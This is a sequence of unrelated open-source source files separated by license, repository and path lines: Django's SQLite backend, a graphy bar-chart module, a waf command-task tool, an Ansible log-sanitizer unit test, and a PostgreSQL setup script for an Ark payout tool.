""" SQLite backend for the sqlite3 module in the standard library. """ import datetime import decimal import functools import math import operator import re import statistics import warnings from itertools import chain from sqlite3 import dbapi2 as Database import pytz from django.core.exceptions import ImproperlyConfigured from django.db import utils from django.db.backends import utils as backend_utils from django.db.backends.base.base import BaseDatabaseWrapper from django.utils import timezone from django.utils.dateparse import parse_datetime, parse_time from django.utils.duration import duration_microseconds from .client import DatabaseClient # isort:skip from .creation import DatabaseCreation # isort:skip from .features import DatabaseFeatures # isort:skip from .introspection import DatabaseIntrospection # isort:skip from .operations import DatabaseOperations # isort:skip from .schema import DatabaseSchemaEditor # isort:skip def decoder(conv_func): """ Convert bytestrings from Python's sqlite3 interface to a regular string. """ return lambda s: conv_func(s.decode()) def none_guard(func): """ Decorator that returns None if any of the arguments to the decorated function are None. Many SQL functions return NULL if any of their arguments are NULL. This decorator simplifies the implementation of this for the custom functions registered below. """ @functools.wraps(func) def wrapper(*args, **kwargs): return None if None in args else func(*args, **kwargs) return wrapper def list_aggregate(function): """ Return an aggregate class that accumulates values in a list and applies the provided function to the data. """ return type('ListAggregate', (list,), {'finalize': function, 'step': list.append}) def check_sqlite_version(): if Database.sqlite_version_info < (3, 8, 3): raise ImproperlyConfigured('SQLite 3.8.3 or later is required (found %s).' 
% Database.sqlite_version) check_sqlite_version() Database.register_converter("bool", b'1'.__eq__) Database.register_converter("time", decoder(parse_time)) Database.register_converter("datetime", decoder(parse_datetime)) Database.register_converter("timestamp", decoder(parse_datetime)) Database.register_converter("TIMESTAMP", decoder(parse_datetime)) Database.register_adapter(decimal.Decimal, str) class DatabaseWrapper(BaseDatabaseWrapper): vendor = 'sqlite' display_name = 'SQLite' # SQLite doesn't actually support most of these types, but it "does the right # thing" given more verbose field definitions, so leave them as is so that # schema inspection is more useful. data_types = { 'AutoField': 'integer', 'BigAutoField': 'integer', 'BinaryField': 'BLOB', 'BooleanField': 'bool', 'CharField': 'varchar(%(max_length)s)', 'DateField': 'date', 'DateTimeField': 'datetime', 'DecimalField': 'decimal', 'DurationField': 'bigint', 'FileField': 'varchar(%(max_length)s)', 'FilePathField': 'varchar(%(max_length)s)', 'FloatField': 'real', 'IntegerField': 'integer', 'BigIntegerField': 'bigint', 'IPAddressField': 'char(15)', 'GenericIPAddressField': 'char(39)', 'NullBooleanField': 'bool', 'OneToOneField': 'integer', 'PositiveIntegerField': 'integer unsigned', 'PositiveSmallIntegerField': 'smallint unsigned', 'SlugField': 'varchar(%(max_length)s)', 'SmallIntegerField': 'smallint', 'TextField': 'text', 'TimeField': 'time', 'UUIDField': 'char(32)', } data_type_check_constraints = { 'PositiveIntegerField': '"%(column)s" >= 0', 'PositiveSmallIntegerField': '"%(column)s" >= 0', } data_types_suffix = { 'AutoField': 'AUTOINCREMENT', 'BigAutoField': 'AUTOINCREMENT', } # SQLite requires LIKE statements to include an ESCAPE clause if the value # being escaped has a percent or underscore in it. # See https://www.sqlite.org/lang_expr.html for an explanation. 
operators = { 'exact': '= %s', 'iexact': "LIKE %s ESCAPE '\\'", 'contains': "LIKE %s ESCAPE '\\'", 'icontains': "LIKE %s ESCAPE '\\'", 'regex': 'REGEXP %s', 'iregex': "REGEXP '(?i)' || %s", 'gt': '> %s', 'gte': '>= %s', 'lt': '< %s', 'lte': '<= %s', 'startswith': "LIKE %s ESCAPE '\\'", 'endswith': "LIKE %s ESCAPE '\\'", 'istartswith': "LIKE %s ESCAPE '\\'", 'iendswith': "LIKE %s ESCAPE '\\'", } # The patterns below are used to generate SQL pattern lookup clauses when # the right-hand side of the lookup isn't a raw string (it might be an expression # or the result of a bilateral transformation). # In those cases, special characters for LIKE operators (e.g. \, *, _) should be # escaped on database side. # # Note: we use str.format() here for readability as '%' is used as a wildcard for # the LIKE operator. pattern_esc = r"REPLACE(REPLACE(REPLACE({}, '\', '\\'), '%%', '\%%'), '_', '\_')" pattern_ops = { 'contains': r"LIKE '%%' || {} || '%%' ESCAPE '\'", 'icontains': r"LIKE '%%' || UPPER({}) || '%%' ESCAPE '\'", 'startswith': r"LIKE {} || '%%' ESCAPE '\'", 'istartswith': r"LIKE UPPER({}) || '%%' ESCAPE '\'", 'endswith': r"LIKE '%%' || {} ESCAPE '\'", 'iendswith': r"LIKE '%%' || UPPER({}) ESCAPE '\'", } Database = Database SchemaEditorClass = DatabaseSchemaEditor # Classes instantiated in __init__(). client_class = DatabaseClient creation_class = DatabaseCreation features_class = DatabaseFeatures introspection_class = DatabaseIntrospection ops_class = DatabaseOperations def get_connection_params(self): settings_dict = self.settings_dict if not settings_dict['NAME']: raise ImproperlyConfigured( "settings.DATABASES is improperly configured. " "Please supply the NAME value.") kwargs = { 'database': settings_dict['NAME'], 'detect_types': Database.PARSE_DECLTYPES | Database.PARSE_COLNAMES, **settings_dict['OPTIONS'], } # Always allow the underlying SQLite connection to be shareable # between multiple threads. 
The safe-guarding will be handled at a # higher level by the `BaseDatabaseWrapper.allow_thread_sharing` # property. This is necessary as the shareability is disabled by # default in pysqlite and it cannot be changed once a connection is # opened. if 'check_same_thread' in kwargs and kwargs['check_same_thread']: warnings.warn( 'The `check_same_thread` option was provided and set to ' 'True. It will be overridden with False. Use the ' '`DatabaseWrapper.allow_thread_sharing` property instead ' 'for controlling thread shareability.', RuntimeWarning ) kwargs.update({'check_same_thread': False, 'uri': True}) return kwargs def get_new_connection(self, conn_params): conn = Database.connect(**conn_params) conn.create_function("django_date_extract", 2, _sqlite_datetime_extract) conn.create_function("django_date_trunc", 2, _sqlite_date_trunc) conn.create_function("django_datetime_cast_date", 2, _sqlite_datetime_cast_date) conn.create_function("django_datetime_cast_time", 2, _sqlite_datetime_cast_time) conn.create_function("django_datetime_extract", 3, _sqlite_datetime_extract) conn.create_function("django_datetime_trunc", 3, _sqlite_datetime_trunc) conn.create_function("django_time_extract", 2, _sqlite_time_extract) conn.create_function("django_time_trunc", 2, _sqlite_time_trunc) conn.create_function("django_time_diff", 2, _sqlite_time_diff) conn.create_function("django_timestamp_diff", 2, _sqlite_timestamp_diff) conn.create_function("django_format_dtdelta", 3, _sqlite_format_dtdelta) conn.create_function('regexp', 2, _sqlite_regexp) conn.create_function('ACOS', 1, none_guard(math.acos)) conn.create_function('ASIN', 1, none_guard(math.asin)) conn.create_function('ATAN', 1, none_guard(math.atan)) conn.create_function('ATAN2', 2, none_guard(math.atan2)) conn.create_function('CEILING', 1, none_guard(math.ceil)) conn.create_function('COS', 1, none_guard(math.cos)) conn.create_function('COT', 1, none_guard(lambda x: 1 / math.tan(x))) conn.create_function('DEGREES', 1, 
none_guard(math.degrees)) conn.create_function('EXP', 1, none_guard(math.exp)) conn.create_function('FLOOR', 1, none_guard(math.floor)) conn.create_function('LN', 1, none_guard(math.log)) conn.create_function('LOG', 2, none_guard(lambda x, y: math.log(y, x))) conn.create_function('LPAD', 3, _sqlite_lpad) conn.create_function('MOD', 2, none_guard(math.fmod)) conn.create_function('PI', 0, lambda: math.pi) conn.create_function('POWER', 2, none_guard(operator.pow)) conn.create_function('RADIANS', 1, none_guard(math.radians)) conn.create_function('REPEAT', 2, none_guard(operator.mul)) conn.create_function('REVERSE', 1, none_guard(lambda x: x[::-1])) conn.create_function('RPAD', 3, _sqlite_rpad) conn.create_function('SIN', 1, none_guard(math.sin)) conn.create_function('SQRT', 1, none_guard(math.sqrt)) conn.create_function('TAN', 1, none_guard(math.tan)) conn.create_aggregate('STDDEV_POP', 1, list_aggregate(statistics.pstdev)) conn.create_aggregate('STDDEV_SAMP', 1, list_aggregate(statistics.stdev)) conn.create_aggregate('VAR_POP', 1, list_aggregate(statistics.pvariance)) conn.create_aggregate('VAR_SAMP', 1, list_aggregate(statistics.variance)) conn.execute('PRAGMA foreign_keys = ON') return conn def init_connection_state(self): pass def create_cursor(self, name=None): return self.connection.cursor(factory=SQLiteCursorWrapper) def close(self): self.validate_thread_sharing() # If database is in memory, closing the connection destroys the # database. To prevent accidental data loss, ignore close requests on # an in-memory db. if not self.is_in_memory_db(): BaseDatabaseWrapper.close(self) def _savepoint_allowed(self): # When 'isolation_level' is not None, sqlite3 commits before each # savepoint; it's a bug. When it is None, savepoints don't make sense # because autocommit is enabled. The only exception is inside 'atomic' # blocks. To work around that bug, on SQLite, 'atomic' starts a # transaction explicitly rather than simply disable autocommit. 
return self.in_atomic_block def _set_autocommit(self, autocommit): if autocommit: level = None else: # sqlite3's internal default is ''. It's different from None. # See Modules/_sqlite/connection.c. level = '' # 'isolation_level' is a misleading API. # SQLite always runs at the SERIALIZABLE isolation level. with self.wrap_database_errors: self.connection.isolation_level = level def disable_constraint_checking(self): with self.cursor() as cursor: cursor.execute('PRAGMA foreign_keys = OFF') # Foreign key constraints cannot be turned off while in a multi- # statement transaction. Fetch the current state of the pragma # to determine if constraints are effectively disabled. enabled = cursor.execute('PRAGMA foreign_keys').fetchone()[0] return not bool(enabled) def enable_constraint_checking(self): self.cursor().execute('PRAGMA foreign_keys = ON') def check_constraints(self, table_names=None): """ Check each table name in `table_names` for rows with invalid foreign key references. This method is intended to be used in conjunction with `disable_constraint_checking()` and `enable_constraint_checking()`, to determine if rows with invalid references were entered while constraint checks were off. 
""" if self.features.supports_pragma_foreign_key_check: with self.cursor() as cursor: if table_names is None: violations = self.cursor().execute('PRAGMA foreign_key_check').fetchall() else: violations = chain.from_iterable( cursor.execute('PRAGMA foreign_key_check(%s)' % table_name).fetchall() for table_name in table_names ) # See https://www.sqlite.org/pragma.html#pragma_foreign_key_check for table_name, rowid, referenced_table_name, foreign_key_index in violations: foreign_key = cursor.execute( 'PRAGMA foreign_key_list(%s)' % table_name ).fetchall()[foreign_key_index] column_name, referenced_column_name = foreign_key[3:5] primary_key_column_name = self.introspection.get_primary_key_column(cursor, table_name) primary_key_value, bad_value = cursor.execute( 'SELECT %s, %s FROM %s WHERE rowid = %%s' % ( primary_key_column_name, column_name, table_name ), (rowid,), ).fetchone() raise utils.IntegrityError( "The row in table '%s' with primary key '%s' has an " "invalid foreign key: %s.%s contains a value '%s' that " "does not have a corresponding value in %s.%s." 
% ( table_name, primary_key_value, table_name, column_name, bad_value, referenced_table_name, referenced_column_name ) ) else: with self.cursor() as cursor: if table_names is None: table_names = self.introspection.table_names(cursor) for table_name in table_names: primary_key_column_name = self.introspection.get_primary_key_column(cursor, table_name) if not primary_key_column_name: continue key_columns = self.introspection.get_key_columns(cursor, table_name) for column_name, referenced_table_name, referenced_column_name in key_columns: cursor.execute( """ SELECT REFERRING.`%s`, REFERRING.`%s` FROM `%s` as REFERRING LEFT JOIN `%s` as REFERRED ON (REFERRING.`%s` = REFERRED.`%s`) WHERE REFERRING.`%s` IS NOT NULL AND REFERRED.`%s` IS NULL """ % ( primary_key_column_name, column_name, table_name, referenced_table_name, column_name, referenced_column_name, column_name, referenced_column_name, ) ) for bad_row in cursor.fetchall(): raise utils.IntegrityError( "The row in table '%s' with primary key '%s' has an " "invalid foreign key: %s.%s contains a value '%s' that " "does not have a corresponding value in %s.%s." % ( table_name, bad_row[0], table_name, column_name, bad_row[1], referenced_table_name, referenced_column_name, ) ) def is_usable(self): return True def _start_transaction_under_autocommit(self): """ Start a transaction explicitly in autocommit mode. Staying in autocommit mode works around a bug of sqlite3 that breaks savepoints when autocommit is disabled. """ self.cursor().execute("BEGIN") def is_in_memory_db(self): return self.creation.is_in_memory_db(self.settings_dict['NAME']) FORMAT_QMARK_REGEX = re.compile(r'(?<!%)%s') class SQLiteCursorWrapper(Database.Cursor): """ Django uses "format" style placeholders, but pysqlite2 uses "qmark" style. This fixes it -- but note that if you want to use a literal "%s" in a query, you'll need to use "%%s". 
""" def execute(self, query, params=None): if params is None: return Database.Cursor.execute(self, query) query = self.convert_query(query) return Database.Cursor.execute(self, query, params) def executemany(self, query, param_list): query = self.convert_query(query) return Database.Cursor.executemany(self, query, param_list) def convert_query(self, query): return FORMAT_QMARK_REGEX.sub('?', query).replace('%%', '%') def _sqlite_datetime_parse(dt, tzname=None): if dt is None: return None try: dt = backend_utils.typecast_timestamp(dt) except (TypeError, ValueError): return None if tzname is not None: dt = timezone.localtime(dt, pytz.timezone(tzname)) return dt def _sqlite_date_trunc(lookup_type, dt): dt = _sqlite_datetime_parse(dt) if dt is None: return None if lookup_type == 'year': return "%i-01-01" % dt.year elif lookup_type == 'quarter': month_in_quarter = dt.month - (dt.month - 1) % 3 return '%i-%02i-01' % (dt.year, month_in_quarter) elif lookup_type == 'month': return "%i-%02i-01" % (dt.year, dt.month) elif lookup_type == 'week': dt = dt - datetime.timedelta(days=dt.weekday()) return "%i-%02i-%02i" % (dt.year, dt.month, dt.day) elif lookup_type == 'day': return "%i-%02i-%02i" % (dt.year, dt.month, dt.day) def _sqlite_time_trunc(lookup_type, dt): if dt is None: return None try: dt = backend_utils.typecast_time(dt) except (ValueError, TypeError): return None if lookup_type == 'hour': return "%02i:00:00" % dt.hour elif lookup_type == 'minute': return "%02i:%02i:00" % (dt.hour, dt.minute) elif lookup_type == 'second': return "%02i:%02i:%02i" % (dt.hour, dt.minute, dt.second) def _sqlite_datetime_cast_date(dt, tzname): dt = _sqlite_datetime_parse(dt, tzname) if dt is None: return None return dt.date().isoformat() def _sqlite_datetime_cast_time(dt, tzname): dt = _sqlite_datetime_parse(dt, tzname) if dt is None: return None return dt.time().isoformat() def _sqlite_datetime_extract(lookup_type, dt, tzname=None): dt = _sqlite_datetime_parse(dt, tzname) if dt is None: 
return None if lookup_type == 'week_day': return (dt.isoweekday() % 7) + 1 elif lookup_type == 'week': return dt.isocalendar()[1] elif lookup_type == 'quarter': return math.ceil(dt.month / 3) elif lookup_type == 'iso_year': return dt.isocalendar()[0] else: return getattr(dt, lookup_type) def _sqlite_datetime_trunc(lookup_type, dt, tzname): dt = _sqlite_datetime_parse(dt, tzname) if dt is None: return None if lookup_type == 'year': return "%i-01-01 00:00:00" % dt.year elif lookup_type == 'quarter': month_in_quarter = dt.month - (dt.month - 1) % 3 return '%i-%02i-01 00:00:00' % (dt.year, month_in_quarter) elif lookup_type == 'month': return "%i-%02i-01 00:00:00" % (dt.year, dt.month) elif lookup_type == 'week': dt = dt - datetime.timedelta(days=dt.weekday()) return "%i-%02i-%02i 00:00:00" % (dt.year, dt.month, dt.day) elif lookup_type == 'day': return "%i-%02i-%02i 00:00:00" % (dt.year, dt.month, dt.day) elif lookup_type == 'hour': return "%i-%02i-%02i %02i:00:00" % (dt.year, dt.month, dt.day, dt.hour) elif lookup_type == 'minute': return "%i-%02i-%02i %02i:%02i:00" % (dt.year, dt.month, dt.day, dt.hour, dt.minute) elif lookup_type == 'second': return "%i-%02i-%02i %02i:%02i:%02i" % (dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second) def _sqlite_time_extract(lookup_type, dt): if dt is None: return None try: dt = backend_utils.typecast_time(dt) except (ValueError, TypeError): return None return getattr(dt, lookup_type) @none_guard def _sqlite_format_dtdelta(conn, lhs, rhs): """ LHS and RHS can be either: - An integer number of microseconds - A string representing a datetime """ try: real_lhs = datetime.timedelta(0, 0, lhs) if isinstance(lhs, int) else backend_utils.typecast_timestamp(lhs) real_rhs = datetime.timedelta(0, 0, rhs) if isinstance(rhs, int) else backend_utils.typecast_timestamp(rhs) if conn.strip() == '+': out = real_lhs + real_rhs else: out = real_lhs - real_rhs except (ValueError, TypeError): return None # typecast_timestamp returns a date or a 
datetime without timezone. # It will be formatted as "%Y-%m-%d" or "%Y-%m-%d %H:%M:%S[.%f]" return str(out) @none_guard def _sqlite_time_diff(lhs, rhs): left = backend_utils.typecast_time(lhs) right = backend_utils.typecast_time(rhs) return ( (left.hour * 60 * 60 * 1000000) + (left.minute * 60 * 1000000) + (left.second * 1000000) + (left.microsecond) - (right.hour * 60 * 60 * 1000000) - (right.minute * 60 * 1000000) - (right.second * 1000000) - (right.microsecond) ) @none_guard def _sqlite_timestamp_diff(lhs, rhs): left = backend_utils.typecast_timestamp(lhs) right = backend_utils.typecast_timestamp(rhs) return duration_microseconds(left - right) @none_guard def _sqlite_regexp(re_pattern, re_string): return bool(re.search(re_pattern, str(re_string))) @none_guard def _sqlite_lpad(text, length, fill_text): if len(text) >= length: return text[:length] return (fill_text * length)[:length - len(text)] + text @none_guard def _sqlite_rpad(text, length, fill_text): return (text + fill_text * length)[:length]
mit
sahiljain/catapult
third_party/graphy/graphy/bar_chart.py
233
5769
#!/usr/bin/python2.4 # # Copyright 2008 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Code related to bar charts.""" import copy import warnings from graphy import common from graphy import util class BarsStyle(object): """Style of a series of bars in a BarChart Object Attributes: color: Hex string, like '00ff00' for green """ def __init__(self, color): self.color = color class BarChartStyle(object): """Represents the style for bars on a BarChart. Any of the object attributes may be set to None, in which case the value will be auto-calculated. Object Attributes: bar_thickness: The thickness of a bar, in pixels. bar_gap: The gap between bars, in pixels, or as a fraction of bar thickness if use_fractional_gap_spacing is True. group_gap: The gap between groups of bars, in pixels, or as a fraction of bar thickness if use_fractional_gap_spacing is True. use_fractional_gap_spacing: if True, bar_gap and group_gap specify gap sizes as a fraction of bar width. Default is False. """ _DEFAULT_GROUP_GAP = 8 _DEFAULT_BAR_GAP = 4 def __init__(self, bar_thickness=None, bar_gap=_DEFAULT_BAR_GAP, group_gap=_DEFAULT_GROUP_GAP, use_fractional_gap_spacing=False): """Create a new BarChartStyle. Args: bar_thickness: The thickness of a bar, in pixels. Set this to None if you want the bar thickness to be auto-calculated (this is the default behaviour). bar_gap: The gap between bars, in pixels. Default is 4. group_gap: The gap between groups of bars, in pixels. Default is 8. 
""" self.bar_thickness = bar_thickness self.bar_gap = bar_gap self.group_gap = group_gap self.use_fractional_gap_spacing = use_fractional_gap_spacing class BarStyle(BarChartStyle): def __init__(self, *args, **kwargs): warnings.warn('BarStyle is deprecated. Use BarChartStyle.', DeprecationWarning, stacklevel=2) super(BarStyle, self).__init__(*args, **kwargs) class BarChart(common.BaseChart): """Represents a bar chart. Object attributes: vertical: if True, the bars will be vertical. Default is True. stacked: if True, the bars will be stacked. Default is False. style: The BarChartStyle for all bars on this chart, specifying bar thickness and gaps between bars. """ def __init__(self, points=None): """Constructor for BarChart objects.""" super(BarChart, self).__init__() if points is not None: self.AddBars(points) self.vertical = True self.stacked = False self.style = BarChartStyle(None, None, None) # full auto def AddBars(self, points, label=None, color=None): """Add a series of bars to the chart. points: List of y-values for the bars in this series label: Name of the series (used in the legend) color: Hex string, like '00ff00' for green This is a convenience method which constructs & appends the DataSeries for you. """ if label is not None and util._IsColor(label): warnings.warn('Your code may be broken! ' 'Label is a hex triplet. Maybe it is a color? 
The ' 'old argument order (color before label) is deprecated.', DeprecationWarning, stacklevel=2) style = BarsStyle(color) series = common.DataSeries(points, label=label, style=style) self.data.append(series) return series def GetDependentAxes(self): """Get the dependendant axes, which depend on orientation.""" if self.vertical: return (self._axes[common.AxisPosition.LEFT] + self._axes[common.AxisPosition.RIGHT]) else: return (self._axes[common.AxisPosition.TOP] + self._axes[common.AxisPosition.BOTTOM]) def GetIndependentAxes(self): """Get the independendant axes, which depend on orientation.""" if self.vertical: return (self._axes[common.AxisPosition.TOP] + self._axes[common.AxisPosition.BOTTOM]) else: return (self._axes[common.AxisPosition.LEFT] + self._axes[common.AxisPosition.RIGHT]) def GetDependentAxis(self): """Get the main dependendant axis, which depends on orientation.""" if self.vertical: return self.left else: return self.bottom def GetIndependentAxis(self): """Get the main independendant axis, which depends on orientation.""" if self.vertical: return self.bottom else: return self.left def GetMinMaxValues(self): """Get the largest & smallest bar values as (min_value, max_value).""" if not self.stacked: return super(BarChart, self).GetMinMaxValues() if not self.data: return None, None # No data, nothing to do. num_bars = max(len(series.data) for series in self.data) positives = [0 for i in xrange(0, num_bars)] negatives = list(positives) for series in self.data: for i, point in enumerate(series.data): if point: if point > 0: positives[i] += point else: negatives[i] += point min_value = min(min(positives), min(negatives)) max_value = max(max(positives), max(negatives)) return min_value, max_value
bsd-3-clause
nsol-nmsu/ns3-smartgrid
waf-tools/command.py
5
4202
import re import subprocess # import feature, taskgen_method, before_method, task_gen from waflib import TaskGen, Node, Task, Utils, Build, Options, Logs, Task debug = Logs.debug error = Logs.error import shellcmd #shellcmd.subprocess = pproc # the WAF version of the subprocess module is supposedly less buggy shellcmd.debug = debug arg_rx = re.compile(r"(?P<dollar>\$\$)|(?P<subst>\$\{(?P<var>\w+)(?P<code>.*?)\})", re.M) class command_task(Task.Task): color = "BLUE" def __init__(self, env, generator): Task.Task.__init__(self, env=env, normal=1, generator=generator) def __str__(self): "string to display to the user" env = self.env src_str = ' '.join([a.path_from(a.ctx.launch_node()) for a in self.inputs]) tgt_str = ' '.join([a.path_from(a.ctx.launch_node()) for a in self.outputs]) if self.outputs: sep = ' -> ' else: sep = '' pipeline = shellcmd.Pipeline() pipeline.parse(self.generator.command) cmd = pipeline.get_abbreviated_command() return 'command (%s): %s%s%s' % (cmd, src_str, sep, tgt_str) def _subst_arg(self, arg, direction, namespace): """ @param arg: the command argument (or stdin/stdout/stderr) to substitute @param direction: direction of the argument: 'in', 'out', or None """ def repl(match): if match.group('dollar'): return "$" elif match.group('subst'): var = match.group('var') code = match.group('code') result = eval(var+code, namespace) if isinstance(result, Node.Node): if var == 'TGT': return result.get_bld().abspath() elif var == 'SRC': return result.srcpath() else: raise ValueError("Bad subst variable %r" % var) elif result is self.inputs: if len(self.inputs) == 1: return result[0].srcpath() else: raise ValueError("${SRC} requested but have multiple sources; which one?") elif result is self.outputs: if len(self.outputs) == 1: return result[0].get_bld().abspath() else: raise ValueError("${TGT} requested but have multiple targets; which one?") elif isinstance(result, list): assert len(result) == 1 return result[0] else: return result return None return 
arg_rx.sub(repl, arg) def run(self): pipeline = shellcmd.Pipeline() pipeline.parse(self.generator.command) namespace = self.env.get_merged_dict() if self.generator.variables is not None: namespace.update(self.generator.variables) namespace.update(env=self.env, SRC=self.inputs, TGT=self.outputs) for cmd in pipeline.pipeline: if isinstance(cmd, shellcmd.Command): if isinstance(cmd.stdin, basestring): cmd.stdin = self._subst_arg(cmd.stdin, 'in', namespace) if isinstance(cmd.stdout, basestring): cmd.stdout = self._subst_arg(cmd.stdout, 'out', namespace) if isinstance(cmd.stderr, basestring): cmd.stderr = self._subst_arg(cmd.stderr, 'out', namespace) for argI in xrange(len(cmd.argv)): cmd.argv[argI] = self._subst_arg(cmd.argv[argI], None, namespace) if cmd.env_vars is not None: env_vars = dict() for name, value in cmd.env_vars.iteritems(): env_vars[name] = self._subst_arg(value, None, namespace) cmd.env_vars = env_vars elif isinstance(cmd, shellcmd.Chdir): cmd.dir = self._subst_arg(cmd.dir, None, namespace) return pipeline.run(verbose=(Options.options.verbose > 0)) @TaskGen.taskgen_method @TaskGen.feature('command') def init_command(self): Utils.def_attrs(self, # other variables that can be used in the command: ${VARIABLE} variables = None, rule='') @TaskGen.feature('command') @TaskGen.after_method('process_rule') def apply_command(self): #self.meths.remove('apply_core') # create the task task = self.create_task('command') setattr(task, "dep_vars", getattr(self, "dep_vars", None)) # process the sources inputs = [] for node in self.source: inputs.append(node) task.set_inputs(inputs) task.set_outputs([self.path.find_or_declare(tgt) for tgt in self.to_list(self.target)]) self.source = '' #Task.file_deps = Task.extract_deps # class command_taskgen(task_gen): # def __init__(self, *k, **kw): # task_gen.__init__(self, *k, **kw) # self.features.append('command')
gpl-2.0
ar7z1/ansible
test/units/module_utils/basic/test_heuristic_log_sanitize.py
56
3727
# -*- coding: utf-8 -*- # (c) 2015, Toshio Kuratomi <tkuratomi@ansible.com> # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. # Make coding more python3-ish from __future__ import (absolute_import, division) __metaclass__ = type from units.compat import unittest from ansible.module_utils.basic import heuristic_log_sanitize class TestHeuristicLogSanitize(unittest.TestCase): def setUp(self): self.URL_SECRET = 'http://username:pas:word@foo.com/data' self.SSH_SECRET = 'username:pas:word@foo.com/data' self.clean_data = repr(self._gen_data(3, True, True, 'no_secret_here')) self.url_data = repr(self._gen_data(3, True, True, self.URL_SECRET)) self.ssh_data = repr(self._gen_data(3, True, True, self.SSH_SECRET)) def _gen_data(self, records, per_rec, top_level, secret_text): hostvars = {'hostvars': {}} for i in range(1, records, 1): host_facts = { 'host%s' % i: { 'pstack': { 'running': '875.1', 'symlinked': '880.0', 'tars': [], 'versions': ['885.0'] }, } } if per_rec: host_facts['host%s' % i]['secret'] = secret_text hostvars['hostvars'].update(host_facts) if top_level: hostvars['secret'] = secret_text return hostvars def test_did_not_hide_too_much(self): self.assertEquals(heuristic_log_sanitize(self.clean_data), self.clean_data) def test_hides_url_secrets(self): url_output = heuristic_log_sanitize(self.url_data) # Basic functionality: Successfully hid the password 
self.assertNotIn('pas:word', url_output) # Slightly more advanced, we hid all of the password despite the ":" self.assertNotIn('pas', url_output) # In this implementation we replace the password with 8 "*" which is # also the length of our password. The url fields should be able to # accurately detect where the password ends so the length should be # the same: self.assertEqual(len(url_output), len(self.url_data)) def test_hides_ssh_secrets(self): ssh_output = heuristic_log_sanitize(self.ssh_data) self.assertNotIn('pas:word', ssh_output) # Slightly more advanced, we hid all of the password despite the ":" self.assertNotIn('pas', ssh_output) # ssh checking is harder as the heuristic is overzealous in many # cases. Since the input will have at least one ":" present before # the password we can tell some things about the beginning and end of # the data, though: self.assertTrue(ssh_output.startswith("{'")) self.assertTrue(ssh_output.endswith("}")) self.assertIn(":********@foo.com/data'", ssh_output) def test_hides_parameter_secrets(self): output = heuristic_log_sanitize('token="secret", user="person", token_entry="test=secret"', frozenset(['secret'])) self.assertNotIn('secret', output)
gpl-3.0
Nijmegen-Consultancy-Group/PayoutScriptArk
install.py
1
4763
import psycopg2 from psycopg2.extensions import ISOLATION_LEVEL_AUTOCOMMIT # <-- ADD THIS LINE import logging.handlers import config def create_db(user_name, password): # check if database doesn't already exists try: con = psycopg2.connect(dbname='postgres', user=user_name, host='localhost', password=password) con.set_isolation_level(ISOLATION_LEVEL_AUTOCOMMIT) # <-- ADD THIS LINE cur = con.cursor() cur.execute("CREATE DATABASE payoutscript_administration") except psycopg2.ProgrammingError: return def create_table_locks(user_name, password): con = psycopg2.connect(dbname='payoutscript_administration', user=user_name, host='localhost', password=password) con.autocommit = True cur = con.cursor() cur.execute("""CREATE TABLE IF NOT EXISTS locks ( id SERIAL PRIMARY KEY, locked BOOLEAN);""") def create_table_delegate(user_name, password): con = psycopg2.connect(dbname='payoutscript_administration', user=user_name, host='localhost', password=password) con.autocommit = True cur = con.cursor() cur.execute("""CREATE TABLE IF NOT EXISTS delegate ( id SERIAL PRIMARY KEY, address VARCHAR(50), reward BIGINT);""") def grant_privileges(user_name, password): con = psycopg2.connect(dbname='payoutscript_administration', user=user_name, host='localhost', password=password) con.autocommit = True cur = con.cursor() cur.execute("""GRANT ALL PRIVILEGES ON ALL TABLES IN SCHEMA public TO {};""".format(config.CONNECTION['USER'])) def create_empty_lock(user_name, password): con = psycopg2.connect(dbname='payoutscript_administration', user=user_name, host='localhost', password=password) con.autocommit = True cur = con.cursor() cur.execute("""INSERT INTO locks VALUES (1, FALSE) ON CONFLICT DO NOTHING;""") def create_delegate_entry(user_name, password): con = psycopg2.connect(dbname='payoutscript_administration', user=user_name, host='localhost', password=password) con.autocommit = True cur = con.cursor() cur.execute("""INSERT INTO delegate (id, address, reward) VALUES (1, '{}', 0) ON CONFLICT 
DO NOTHING;;""".format(config.DELEGATE['ADDRESS'])) def create_table_users_payouts(user_name, password): con = psycopg2.connect(dbname='payoutscript_administration', user=user_name, host='localhost', password=password) con.autocommit = True cur = con.cursor() cur.execute("""CREATE TABLE IF NOT EXISTS users_payouts ( address VARCHAR(50) PRIMARY KEY, payout BIGINT, last_payout BIGINT);""") if __name__ == '__main__': # Initialize logging logger = logging.getLogger(__name__) handler = logging.handlers.RotatingFileHandler(config.LOGGING['LOGDIR'], encoding='utf-8', maxBytes=10 * 1024 * 1024, backupCount=5) formatter = logging.Formatter('%(asctime)s %(name)-12s %(levelname)-8s %(message)s') handler.setFormatter(formatter) logger.addHandler(handler) logger.setLevel(config.LOGGING['LOGGING_LEVEL']) user_name = input('Please provide a psql user eligble to create a database: ') password = input('Please provide the password of psql user "{}": '.format(user_name)) print('Creating database') create_db(user_name, password) print('Success') print('creating tables') create_table_locks(user_name, password) create_table_delegate(user_name, password) create_table_users_payouts(user_name, password) print('Success') print('granting privileges') grant_privileges(user_name, password) print('success') print('creating lock') create_empty_lock(user_name, password) print('success') print('creating delegate entry') create_delegate_entry(user_name, password) print('success')
mit
codingkevin/suds
suds/xsd/__init__.py
18
2609
